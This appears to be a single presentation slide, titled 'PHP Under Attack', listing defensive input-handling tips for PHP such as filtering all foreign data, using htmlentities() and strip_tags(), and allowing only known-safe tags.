PHP Under Attack

• Filter ALL foreign data

• Let PHP help - htmlentities(), strip_tags(), utf8_decode(), etc.

• Don't try to guess bad tags - only allow safe ones

• The bad guys are very creative - you must be, too!